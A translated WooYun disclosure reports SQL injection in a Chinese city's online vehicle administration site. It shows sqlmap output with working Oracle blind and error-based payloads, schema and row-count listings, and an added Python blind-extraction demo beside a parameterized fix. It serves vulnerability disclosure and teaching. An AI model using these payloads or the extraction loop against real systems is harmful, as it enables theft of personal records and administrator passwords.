Vulnerability summary
Followers: 24
Title: SQL injection in the Laiwu City (Shandong Province) online vehicle administration office (网上车管所) exposes 2.4 million detailed records and a large number of plaintext administrator passwords
Submitted: 2015-12-22 15:16
Fixed: 2016-02-07 17:56
Published: 2016-02-07 17:56
Vulnerability type: SQL injection
Severity: High
Self-assessed Rank: 16
Status: handed over to a third-party partner organisation (First Research Institute of the Ministry of Public Security, 公安部一所) for handling
Tags: none
Vulnerability details
Disclosure status:
2015-12-22: details sent to the vendor, awaiting vendor action
2015-12-25: vendor confirmed; details visible to the vendor only
2016-01-04: details disclosed to core white hats and experts in the relevant field
2016-01-14: details disclosed to regular white hats
2016-01-24: details disclosed to intern white hats
2016-02-07: details disclosed to the public
Brief description: SQL injection in the Laiwu City (Shandong Province) online vehicle administration office exposes 2.4 million detailed records and a large number of plaintext administrator passwords.
Detailed description: I found one injection point. There is far too much data: 2.4 million records, including people's detailed personal information and a large number of administrator passwords stored in plaintext, so I did not dump them all one by one.

Injection point:
**.**.**.**:9080/wscgs/xwl.do?smid=18&bgid=02&bj=8
**.**.**.**:9080/wscgs/xwl.do?smid=18

the SQL query used returns 2402024 entries
sqlmap identified the following injection point(s) with a total of 58 HTTP(s) requests:
---
Parameter: smid (GET)
    Type: boolean-based blind
    Title: Oracle boolean-based blind - Parameter replace
    Payload: smid=(SELECT (CASE WHEN (8442=8442) THEN 8442 ELSE CAST(1 AS INT)/(SELECT 0 FROM DUAL) END) FROM DUAL)

    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
    Payload: smid=18 AND 3236=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(113)||CHR(120)||CHR(98)||CHR(113)||CHR(113)||(SELECT (CASE WHEN (3236=3236) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(122)||CHR(113)||CHR(113)||CHR(113)||CHR(62))) FROM DUAL)
---
web application technology: JSP
back-end DBMS: Oracle

How the two payloads work: the boolean-based one replaces the whole smid value with a CASE expression; when the tested condition is false the ELSE branch divides by zero (ORA-01476), so every true/false question becomes "normal page" versus "error page". The error-based one concatenates the CASE result into a string that is not a valid XML name and hands it to XMLType(); the XML parser rejects it and echoes the offending string back in its error message, so when Oracle error text reaches the HTTP response a value can be read in a single request instead of bit by bit.

available databases [34]:
[*] CTXSYS
[*] DRV_ADMIN
[*] DRV_HEALTH
[*] HR
[*] LWTJ
[*] LWZXSL
[*] MDSYS
[*] NET
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] QSWEBCGS_USER
[*] RMAN
[*] SCOTT
[*] SH
[*] SYS
[*] SYSTEM
[*] VEH_ADMIN
[*] VIO_ADMIN
[*] WKSYS
[*] WMS_USER
[*] WMSYS
[*] WSCGS
[*] XDB

Note that sqlmap builds this list from SYS.ALL_USERS, which every Oracle account can read, so the 34 names show which schemas exist on the instance, not that the web application's account can read SYS, SYSTEM or the other schemas; the sample-schema names (HR, OE, PM, SCOTT, SH) do show that the Oracle demo schemas were never removed.

Database: QSWEBCGS_USER
[151 tables]
+----------------------------+
| ALL_TAB                    |
| CODE                       |
| CODETYPE                   |
| DRIVINGLICENSE_TB          |
| DRV_EXAMCARD_TB            |
| DRV_EXAMINATION_SITE_TB    |
| DRV_FLOW_TB                |
| DRV_LEARNER_VEHICLE_TB     |
| DRV_POINTRESET             |
| DRV_PREASIGN_TB            |
| DRV_SCHOOLINFO_TB          |
| DRV_TRAININGRECORDS_BF     |
| DRV_TRAININGRECORDS_TB     |
| KSBM_BM                    |
| KSBM_BMRZ                  |
| KSBM_CODE                  |
| KSBM_GLBM                  |
| KSBM_IPCSXZ                |
| KSBM_JLC                   |
| KSBM_JX                    |
| KSBM_JXJLY                 |
| KSBM_JXPM                  |
| KSBM_KSYY                  |
| KSBM_LLS                   |
| KSBM_QXBM                  |
| KSBM_TS                    |
| KSBM_USER                  |
| KSBM_XZQH                  |
| KSBM_YHQX                  |
| KSBM_YWLX                  |
| LOGS                       |
| MFXX_FLOW                  |
| MFXX_LEARN_INFO            |
| MFXX_RECORD                |
| SDGA_EXAMPXJL              |
| SYS_LOG                    |
| SYS_LOG_PRO                |
| SYS_MANAGER                |
| SYS_PARA                   |
| SYS_USER                   |
| SYS_USER_ONLINE            |
| TAB_COLS                   |
| VEHICLE_TB                 |
| VEHICLE_TEMP_TB            |
| VEH_FLOW_TB                |
| VIO_FINE_TB                |
| VIO_SURVEIL_TB             |
| VIO_VIOLATION_TB           |
| WSCGS_BQ                   |
| WSCGS_CODE                 |
| WSCGS_CODERQ               |
| WSCGS_CODETYPE             |
| WSCGS_CODEWFDM             |
| WSCGS_CSSZ                 |
| WSCGS_FWL                  |
| WSCGS_GGDRV                |
| WSCGS_GGH                  |
| WSCGS_GGVEH                |
| WSCGS_HPZY_SUPPLY          |
| WSCGS_JCXYY_BLACKLIST      |
| WSCGS_JCXYY_JCXDD          |
| WSCGS_JCXYY_PCSZ           |
| WSCGS_JCXYY_PREASIGN       |
| WSCGS_JCXYY_RZ             |
| WSCGS_JCXYY_SJD            |
| WSCGS_JCXYY_TZTG           |
| WSCGS_JCXYY_USER           |
| WSCGS_JKCSSZ               |
| WSCGS_JSRZJ_DRV            |
| WSCGS_JSRZJ_DWUSER         |
| WSCGS_JSRZJ_HTUSER         |
| WSCGS_JSRZJ_IDANDDWDH      |
| WSCGS_JSRZJ_NEWS           |
| WSCGS_JSRZJ_TZTG           |
| WSCGS_JSRZJ_VEH            |
| WSCGS_JSZJ_PERSON          |
| WSCGS_JXPM                 |
| WSCGS_JXPMH                |
| WSCGS_JXPMH_TB             |
| WSCGS_JXPM_TB              |
| WSCGS_KSYY_DRV_PREASIGN    |
| WSCGS_KSYY_DRV_PREASIGN_TB |
| WSCGS_KSYY_FEEGATE         |
| WSCGS_KSYY_JXRSSZ          |
| WSCGS_KSYY_JXRSSZ_TB       |
| WSCGS_KSYY_KCLX            |
| WSCGS_KSYY_KSPC            |
| WSCGS_KSYY_KSPC_TB         |
| WSCGS_KSYY_PXINFOGATE      |
| WSCGS_KSYY_PXINFOGATE_TB   |
| WSCGS_KSYY_PXJLXX          |
| WSCGS_KSYY_RZ              |
| WSCGS_KSYY_USER            |
| WSCGS_KSYY_USER_TB         |
| WSCGS_KSYY_YYJG            |
| WSCGS_LY                   |
| WSCGS_MAP                  |
| WSCGS_NEWS                 |
| WSCGS_QQXX                 |
| WSCGS_REGUSER              |
| WSCGS_RIGHT                |
| WSCGS_SXFW                 |
| WSCGS_TJBLYW               |
| WSCGS_TJBLYW_TB            |
| WSCGS_TJLY_TB              |
| WSCGS_USERS                |
| WSCGS_WBXX                 |
| WSCGS_XHBEFORE             |
| WSCGS_XHBEFORE_COPY        |
| WSCGS_XHBEFORE_TB          |
| WSCGS_XHHPHD               |
| WSCGS_XHHPZY               |
| WSCGS_XHHPZYBY             |
| WSCGS_XHHPZY_TB            |
| WSCGS_XHIPHMD              |
| WSCGS_XHJKDZ               |
| WSCGS_XHKXHD               |
| WSCGS_XHKXHD_TB            |
| WSCGS_XHPROERR             |
| WSCGS_XHPRO_SECURITY       |
| WSCGS_XHPRO_SECURITY_COPY  |
| WSCGS_XHPRO_STEP           |
| WSCGS_XHRZ                 |
| WSCGS_XHSYSINFO            |
| WSCGS_XHSYSINFO_TB         |
| WSCGS_XHUSER               |
| WSCGS_XHXD                 |
| WSCGS_XHXD_TB              |
| WSCGS_XXBG_CODE            |
| WSCGS_XXBG_GLBM            |
| WSCGS_XXBG_JDCXX           |
| WSCGS_XXBG_JDCXXBGRZ       |
| WSCGS_XXBG_JDCXX_TB        |
| WSCGS_XXBG_JSRXX           |
| WSCGS_XXBG_JSRXXBGRZ       |
| WSCGS_XXBG_JSRXX_TB        |
| WSCGS_XXBG_PERSON          |
| WSCGS_XXBG_USER            |
| WSCGS_XXBG_YHJB            |
| WSCGS_XXBG_YHXQ            |
| WSCGS_XXCX_USER            |
| WSCGS_YQLJ                 |
| WSCGS_ZXYW_LSHP            |
| WSCGS_ZXYW_LSHPZP          |
| WSCGS_ZXYW_PLATECLRZ       |
| WSCGS_ZXYW_PLATEDRV        |
| WSCGS_ZXYW_PLATEVEH        |
| WSCGS_ZXYW_PLATEZP         |
| WSCGS_ZXYW_USER            |
| WSCGS_ZXYW_WTJY            |
| WSCGS_ZXYW_WTJYZP          |
+----------------------------+
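The sqlmap output above shows only the payloads, not the loop an attacker (or sqlmap itself) runs behind them. The following is an added illustration, not code from the original report or from the affected application: it models the /wscgs/xwl.do?smid= handler as a Python function that concatenates the parameter into SQL, runs it against an in-memory SQLite database with a constructed `news` table and a constructed `sys_user` table (assumed names, not the real QSWEBCGS_USER schema), and recovers a stored password using nothing but the handler's "record found / no record" answer. SQLite spells the character probe `unicode(substr(...))`; against Oracle it would be `ASCII(SUBSTR(...))` with `FROM DUAL`, but the request pattern and cost (7 requests per character via binary search, plus one end-of-string probe) are the same. The hardened handler beside it binds the id as a parameter and rejects anything that is not an integer.

```python
"""Boolean-based blind SQL injection through an integer id parameter:
the vulnerable concatenation, a character-extraction loop that needs only
a true/false page response, and the parameterized fix that defeats it.

Added illustration, not code from the original report. The Oracle-backed
/wscgs/xwl.do?smid= handler is modelled with an in-memory SQLite database;
the `news` and `sys_user` tables and their rows are constructed for this
demo and are not the real QSWEBCGS_USER schema. SQLite spells the character
probe unicode(substr(...)); Oracle would use ASCII(SUBSTR(...)) FROM DUAL.
"""
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed sample data standing in for the real database."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE news (smid INTEGER, title TEXT)")
    con.execute("CREATE TABLE sys_user (username TEXT, password TEXT)")
    con.executemany("INSERT INTO news VALUES (?, ?)",
                    [(18, "Notice 18"), (19, "Notice 19")])
    con.execute("INSERT INTO sys_user VALUES ('admin', 'Pa55w0rd')")
    return con


def vulnerable_lookup(con: sqlite3.Connection, smid: str) -> bool:
    """Models the original handler: the GET parameter is concatenated
    straight into the WHERE clause. Returns True when the page would
    render a record, which is the only signal a blind attacker needs."""
    sql = "SELECT title FROM news WHERE smid = " + smid  # injection point
    try:
        return con.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False  # a broken query looks like "no record" to the client


def safe_lookup(con: sqlite3.Connection, smid: str) -> bool:
    """Hardened handler: type-check the id and bind it as a parameter,
    so the value is never parsed as SQL. Rejects non-numeric input."""
    if not smid.isdigit():
        raise ValueError("smid must be a numeric id")
    row = con.execute("SELECT title FROM news WHERE smid = ?",
                      (int(smid),)).fetchone()
    return row is not None


def extract_via_blind(oracle, subquery: str, max_len: int = 64):
    """Recover the string produced by `subquery` one character at a time,
    using only the true/false answer from `oracle` (a callable that sends
    one smid value and reports whether a record came back). Each character
    costs 7 requests (binary search over code points 0..127) plus one
    end-of-string probe. Returns (recovered_string, requests_sent)."""
    recovered, requests = "", 0

    def ask(condition: str) -> bool:
        nonlocal requests
        requests += 1
        return oracle(f"18 AND {condition}")  # 18 is a known-good id

    for pos in range(1, max_len + 1):
        probe = f"unicode(substr(({subquery}), {pos}, 1))"
        if not ask(f"{probe} IS NOT NULL"):   # substr past the end -> NULL
            break
        lo, hi = 0, 127
        while lo < hi:                        # narrow down the code point
            mid = (lo + hi) // 2
            if ask(f"{probe} > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        recovered += chr(lo)
    return recovered, requests


ADMIN_PASSWORD_QUERY = "SELECT password FROM sys_user WHERE username = 'admin'"

if __name__ == "__main__":
    db = make_db()
    secret, n = extract_via_blind(lambda p: vulnerable_lookup(db, p),
                                  ADMIN_PASSWORD_QUERY)
    print(f"recovered {secret!r} in {n} requests")
    try:
        safe_lookup(db, "18 AND 1=1")
    except ValueError as exc:
        print("hardened handler rejected the payload:", exc)
```

The "parameter replace" payload sqlmap used produces the same true/false split by a different route (a division by zero in the ELSE branch instead of an AND clause), and the XMLType payload is faster still because the Oracle error text carries the value itself; the remediation is identical for all three: bind parameters for every value, validate the type of identifiers before they reach the query, and run the web application under a database account that can read only the tables it needs.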
Proof of vulnerability:
the SQL query used returns 2402024 entries

Database: QSWEBCGS_USER
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| WSCGS_XHRZ              | 2402024 |
| SYS_LOG_PRO             | 1091760 |
| WSCGS_XHPRO_SECURITY    |  253322 |
| SDGA_EXAMPXJL           |  167522 |
| LOGS                    |   38583 |
| WSCGS_KSYY_DRV_PREASIGN |   30241 |
| SYS_LOG                 |   18617 |
| WSCGS_XHXD              |   17961 |
| WSCGS_XHHPZY            |    9146 |
| WSCGS_XHBEFORE_COPY     |    6398 |
| WSCGS_LY                |    2854 |
| WSCGS_KSYY_RZ           |    1791 |
| WSCGS_JCXYY_PCSZ        |    1230 |
| WSCGS_CODEWFDM          |     779 |
| WSCGS_REGUSER           |     730 |
| TAB_COLS                |     605 |
| WSCGS_KSYY_JXRSSZ       |     526 |
| WSCGS_NEWS              |     480 |
| WSCGS_CODE              |     409 |
| WSCGS_XHBEFORE          |     365 |
| WSCGS_KSYY_KSPC         |     311 |
| WSCGS_JSZJ_PERSON       |     210 |
| WSCGS_XXBG_JSRXX        |     125 |
| WSCGS_XXBG_JDCXX        |      91 |
| WSCGS_ZXYW_PLATEZP      |      90 |
| CODE                    |      66 |
| WSCGS_CODETYPE          |      66 |
| WSCGS_CODERQ            |      64 |
| WSCGS_ZXYW_WTJYZP       |      63 |
| SYS_USER                |      58 |
| MFXX_FLOW               |      54 |
| WSCGS_RIGHT             |      49 |
| WSCGS_ZXYW_WTJY         |      31 |
| ALL_TAB                 |      30 |
| CODETYPE                |      18 |
| WSCGS_KSYY_USER         |      12 |
| WSCGS_XHPROERR          |      12 |
| WSCGS_ZXYW_PLATEDRV     |      12 |
| WSCGS_ZXYW_PLATEVEH     |       9 |
| KSBM_YHQX               |       8 |
| WSCGS_JCXYY_SJD         |       8 |
| WSCGS_JCXYY_PREASIGN    |       7 |
| WSCGS_XHKXHD            |       7 |
| WSCGS_XXBG_YHXQ         |       7 |
| WSCGS_XXBG_CODE         |       5 |
| KSBM_CODE               |       4 |
| WSCGS_JCXYY_USER        |       4 |
| WSCGS_KSYY_FEEGATE      |       4 |
| WSCGS_KSYY_PXINFOGATE   |       4 |
| WSCGS_KSYY_YYJG         |       4 |
| WSCGS_JCXYY_JCXDD       |       3 |
| WSCGS_XHPRO_STEP        |       3 |
| WSCGS_JCXYY_RZ          |       2 |
| WSCGS_SXFW              |       2 |
| WSCGS_USERS             |       2 |
| WSCGS_WBXX              |       2 |
| WSCGS_XXBG_YHJB         |       2 |
| WSCGS_YQLJ              |       2 |
| KSBM_GLBM               |       1 |
| KSBM_USER               |       1 |
| SYS_MANAGER             |       1 |
| WSCGS_BQ                |       1 |
| WSCGS_CSSZ              |       1 |
| WSCGS_FWL               |       1 |
| WSCGS_JKCSSZ            |       1 |
| WSCGS_JSRZJ_HTUSER      |       1 |
| WSCGS_XHJKDZ            |       1 |
| WSCGS_XHSYSINFO         |       1 |
| WSCGS_XHUSER            |       1 |
| WSCGS_XXBG_GLBM         |       1 |
| WSCGS_XXBG_USER         |       1 |
| WSCGS_XXCX_USER         |       1 |
| WSCGS_ZXYW_USER         |       1 |
+-------------------------+---------+

Database: QSWEBCGS_USER
Table: WSCGS_XHRZ
[13 columns]
+--------+----------+
| Column | Type     |
+--------+----------+
| BLSJ   | DATE     |
| BZ1    | VARCHAR2 |
| BZ2    | VARCHAR2 |
| CLSBDH | VARCHAR2 |
| CZBZ   | VARCHAR2 |
| GLBM   | VARCHAR2 |
| HPHM   | VARCHAR2 |
| HPZL   | VARCHAR2 |
| IP     | VARCHAR2 |
| SFCG   | VARCHAR2 |
| SID    | VARCHAR2 |
| YWLX   | VARCHAR2 |
| YZM    | VARCHAR2 |
+--------+----------+

The 2,402,024-row table, WSCGS_XHRZ, is the one behind the "2.4 million" figure. Its column names appear to follow the usual pinyin-initial convention of public-security traffic systems (HPHM = plate number, HPZL = plate type, CLSBDH = vehicle identification number, BLSJ = transaction time, YWLX = business type, IP = client address), which would make it a per-transaction log tying vehicles to the addresses that queried them; the password tables themselves (SYS_USER, 58 rows; the various *_USER tables) are listed by row count only and were not dumped in this proof.
Remediation: none provided.

Copyright notice: please credit the source when reposting: 路人甲 @ WooYun (乌云)
Vulnerability response
Vendor response:
Severity: Medium
Vulnerability Rank: 8
Confirmed: 2015-12-25 16:01
Vendor reply: Thanks for the submission!! Verified and confirmed the described problem; the operator has been notified to fix it.
Latest status: none